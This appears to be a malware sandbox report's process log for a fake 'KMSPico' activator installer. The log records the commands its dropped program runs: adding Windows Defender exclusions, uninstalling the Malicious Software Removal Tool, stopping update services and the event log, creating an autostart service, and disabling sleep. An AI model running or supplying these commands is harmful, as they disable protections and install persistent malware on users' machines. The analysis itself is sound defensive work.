C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTMwODBGMDItQkRCNi00QjVCLTk0RkUtNEJCQjQwREJFRDJGfSIgdXNlcmlkPSJ7QTlDREFDNTMtOENDRS00QzdGLTk3RjgtRDU2NUYwMjA5Q0M2fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9Ins4NkJGQ0IxRS0zMDhFLTQ1N0MtOUQ3Ny1EMjlCNzE2QjVBMjh9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7VlBRb1AxRitmcTE1d1J6aDFrUEw0UE1wV2g4T1JNQjVpenZyT0MvY2hqUT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMxLjAuMjkwMy43MCIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9Ii0xIiBpbnN0YWxsZGF0ZT0iLTEiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzM5OTk2NTQ0MiIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijc0MDAwMDU0MDYiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3Njk5NDY0OTUxIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuZi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy9mODEzNjkwMS1jNWYwLTQzMjYtYmYzMy00ZDczYjg3YTE5Nzk_UDE9MTczMzkyNTkzMCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1CeDlWNW9pNDE0MjBGa08xWkhUS0xkRVg2U2JDbU9iUkRGJTJmZWMwVSUyZm95ajd5TGd6VGhJUE1DTE9PREdKSE5EZGttdEpZdDM2TWJpU0Uwb0t4RkRLS3clM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSIxNzY2MjIxNjAiIHRvdGFsPSIxNzY2MjIxNjAiIGRvd25sb2FkX3RpbWVfbXM9IjIxMDA4Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzY5OTY4NDgyNSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjYiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijc3MjAzNzE4NzAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIxOTY3NTciIHN5c3RlbV91cHRpbWVfdGlja3M9Ijg1MDM3NjE2MzciIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIHVwZGF0ZV9jaGVja190aW1lX21zPSI4NzgiIGRvd25sb2FkX3RpbWVfbXM9IjI5OTU5IiBkb3dubG9hZGVkPSIxNzY2MjIxNjAiIHRvdGFsPSIxNzY2MjIxNjAiIHBhY2thZ2VfY2FjaGVfcmVzdWx0PSIwIiBpbnN0YWxsX3RpbWVfbXM9Ijc4MzM1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg2⤵
- Executes dropped EXE
- Checks system information in the registry
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:6612
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\KMSPico Setup\Password.txt1⤵PID:2940
-
C:\Users\Admin\Downloads\KMSPico Setup\KMSPico_Install\InstallKMS.exe"C:\Users\Admin\Downloads\KMSPico Setup\KMSPico_Install\InstallKMS.exe"1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
PID:5752 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:5732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:3472
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:6440
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:6308
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5968
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1728
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:6848
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1980
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:5604
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:4436
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:2904
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:6928
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "UpdateTaskNameServer"2⤵
- Launches sc.exe
PID:5464
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "UpdateTaskNameServer" binpath= "C:\ProgramData\NameserverUpdate.exe" start= "auto"2⤵
- Launches sc.exe
PID:5016
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:6676
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "UpdateTaskNameServer"2⤵
- Launches sc.exe
PID:6552
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5236
-
C:\Users\Admin\Downloads\KMSPico Setup\KMSPico_Install\InstallKMS.exe"C:\Users\Admin\Downloads\KMSPico Setup\KMSPico_Install\InstallKMS.exe"1⤵PID:6616
-
C:\ProgramData\NameserverUpdate.exeC:\ProgramData\NameserverUpdate.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5508 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:6852
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:6404
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:6828
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:7112
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2728
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:6516
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5744
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:6672
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:2312
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:6984
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:3716
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5000
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Modifies data under HKEY_USERS
PID:4028
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Checks SCSI registry key(s)
PID:6020
-
C:\Program Files (x86)\Fast!\FastSRV.exe"C:\Program Files (x86)\Fast!\FastSRV.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5912 -
C:\Program Files (x86)\Fast!\fast!.exe"C:\Program Files (x86)\Fast!\fast!.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5580 -
C:\Program Files (x86)\Fast!\nwjs\nw.exe"C:\Program Files (x86)\Fast!\nwjs\nw.exe" ui\.3⤵
- Executes dropped EXE
- Checks system information in the registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:5420 -
C:\Program Files (x86)\Fast!\nwjs\nw.exe"C:\Program Files (x86)\Fast!\nwjs\nw.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\FAST!\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\FAST!\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\FAST!\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\FAST!\User Data" --annotation=plat=Win64 --annotation=prod=FAST! --annotation=ver= --initial-client-data=0x290,0x294,0x298,0x28c,0x29c,0x7ff8b9bca970,0x7ff8b9bca980,0x7ff8b9bca9904⤵
- Executes dropped EXE
PID:5940 -
C:\Program Files (x86)\Fast!\nwjs\nw.exe"C:\Program Files (x86)\Fast!\nwjs\nw.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\FAST!\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\FAST!\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=FAST! --annotation=ver= --initial-client-data=0x1b0,0x1b4,0x1b8,0x12c,0x1bc,0x7ff6c449ca30,0x7ff6c449ca40,0x7ff6c449ca505⤵
- Executes dropped EXE
PID:468
-
-
-
C:\Program Files (x86)\Fast!\nwjs\nw.exe"C:\Program Files (x86)\Fast!\nwjs\nw.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\FAST!\User Data" --nwapp-path="ui\." --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2424 --field-trial-handle=2428,i,16233606126861152458,9399691348760646884,262144 /prefetch:24⤵
- Executes dropped EXE
PID:1352
-
-
C:\Program Files (x86)\Fast!\nwjs\nw.exe"C:\Program Files (x86)\Fast!\nwjs\nw.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\FAST!\User Data" --nwapp-path="ui\." --start-stack-profiler --mojo-platform-channel-handle=2140 --field-trial-handle=2428,i,16233606126861152458,9399691348760646884,262144 /prefetch:84⤵
- Executes dropped EXE
PID:6420
-
-
C:\Program Files (x86)\Fast!\nwjs\nw.exe"C:\Program Files (x86)\Fast!\nwjs\nw.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\FAST!\User Data" --nwapp-path="ui\." --mojo-platform-channel-handle=3180 --field-trial-handle=2428,i,16233606126861152458,9399691348760646884,262144 /prefetch:84⤵
- Checks computer location settings
- Executes dropped EXE
PID:1108
-
-
C:\Program Files (x86)\Fast!\nwjs\nw.exe"C:\Program Files (x86)\Fast!\nwjs\nw.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\FAST!\User Data" --nwapp-path="ui\." --nwjs --extension-process --first-renderer-process --no-sandbox --file-url-path-alias="/gen=C:\Program Files (x86)\Fast!\nwjs\gen" --no-zygote --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3224 --field-trial-handle=2428,i,16233606126861152458,9399691348760646884,262144 /prefetch:14⤵
- Checks computer location settings
- Executes dropped EXE
PID:6136
-
-
C:\Program Files (x86)\Fast!\nwjs\nw.exe"C:\Program Files (x86)\Fast!\nwjs\nw.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\FAST!\User Data" --nwapp-path="ui\." --mojo-platform-channel-handle=4204 --field-trial-handle=2428,i,16233606126861152458,9399691348760646884,262144 /prefetch:84⤵
- Executes dropped EXE
PID:5016
-
-
C:\Program Files (x86)\Fast!\nwjs\nw.exe"C:\Program Files (x86)\Fast!\nwjs\nw.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\FAST!\User Data" --nwapp-path="ui\." --mojo-platform-channel-handle=4352 --field-trial-handle=2428,i,16233606126861152458,9399691348760646884,262144 /prefetch:84⤵
- Executes dropped EXE
PID:4188
-
-
C:\Program Files (x86)\Fast!\nwjs\nw.exe"C:\Program Files (x86)\Fast!\nwjs\nw.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\FAST!\User Data" --nwapp-path="ui\." --mojo-platform-channel-handle=4088 --field-trial-handle=2428,i,16233606126861152458,9399691348760646884,262144 /prefetch:84⤵
- Executes dropped EXE
PID:2592
-
-
C:\Program Files (x86)\Fast!\nwjs\nw.exe"C:\Program Files (x86)\Fast!\nwjs\nw.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\FAST!\User Data" --nwapp-path="ui\." --start-stack-profiler --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=3992 --field-trial-handle=2428,i,16233606126861152458,9399691348760646884,262144 /prefetch:24⤵PID:4520
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler1⤵
- Checks system information in the registry
- System Location Discovery: System Language Discovery
PID:3652
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5148
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Checks system information in the registry
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:7172 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\MicrosoftEdge_X64_131.0.2903.70.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\MicrosoftEdge_X64_131.0.2903.70.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable2⤵
- Drops file in Program Files directory
PID:8120 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\EDGEMITMP_C9ECC.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\EDGEMITMP_C9ECC.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\MicrosoftEdge_X64_131.0.2903.70.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable3⤵
- Boot or Logon Autostart Execution: Active Setup
- Installs/modifies Browser Helper Object
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- System policy modification
PID:7824 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\EDGEMITMP_C9ECC.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\EDGEMITMP_C9ECC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.86 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\EDGEMITMP_C9ECC.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.70 --initial-client-data=0x228,0x22c,0x230,0x224,0x200,0x7ff6ec8b2918,0x7ff6ec8b2924,0x7ff6ec8b29304⤵PID:7096
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\EDGEMITMP_C9ECC.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\EDGEMITMP_C9ECC.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=14⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5064 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\EDGEMITMP_C9ECC.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\EDGEMITMP_C9ECC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.86 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{AD42BDF0-8C2B-42C9-AE0B-A8FE5978C296}\EDGEMITMP_C9ECC.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.70 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff6ec8b2918,0x7ff6ec8b2924,0x7ff6ec8b29305⤵PID:1512
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level4⤵PID:8436
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.86 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.70 --initial-client-data=0x224,0x228,0x22c,0x1e8,0x230,0x7ff69ca32918,0x7ff69ca32924,0x7ff69ca329305⤵PID:4548
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level4⤵PID:8424
-
C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=131.0.6778.86 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.70\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=131.0.2903.70 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff69ca32918,0x7ff69ca32924,0x7ff69ca329305⤵PID:6792
-
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RUIyNDYyQkUtRDAzQy00MjkxLUFCMTItOTIyRTg1ODZDREI0fSIgdXNlcmlkPSJ7QTlDREFDNTMtOENDRS00QzdGLTk3RjgtRDU2NUYwMjA5Q0M2fSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins3NDc3NDc2NS1BQTY1LTQxMTMtOEJCMS05NTRDRjZBQkJBQzd9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7Y0JZRVlYODcxdHNHdUtKYW82M1hqVXQ1dkpFOVh4Q1RuRTdIMFBnVWpLRT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE5NS4zOSIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJJc09uSW50ZXJ2YWxDb21tYW5kc0FsbG93ZWQ9JTVCJTIyLXRhcmdldF9kZXYlMjAtbWluX2Jyb3dzZXJfdmVyc2lvbl9jYW5hcnlfZGV2JTIwMTMzLjAuMjk3MC4wJTIyJTVEIiBpbnN0YWxsYWdlPSIwIiBjb2hvcnQ9InJyZkAwLjY5Ij48dXBkYXRlY2hlY2svPjxwaW5nIHI9Ii0xIiByZD0iLTEiLz48L2FwcD48YXBwIGFwcGlkPSJ7NTZFQjE4RjgtQjAwOC00Q0JELUI2RDItOEM5N0ZFN0U5MDYyfSIgdmVyc2lvbj0iOTIuMC45MDIuNjciIG5leHR2ZXJzaW9uPSIxMzEuMC4yOTAzLjcwIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGlzX3Bpbm5lZF9zeXN0ZW09InRydWUiIGxhc3RfbGF1bmNoX2NvdW50PSIxIiBsYXN0X2xhdW5jaF90aW1lPSIxMzM3Nzc5NDg3MDAxNzIxMzAiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwNzE5MDE1ODg4IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwNzE5MDU1NzgxIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwNzY1ODQ2ODA5IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwNzk0OTM2ODc4IiBkb25lX2JlZm9yZV9vb2JlX2Nvb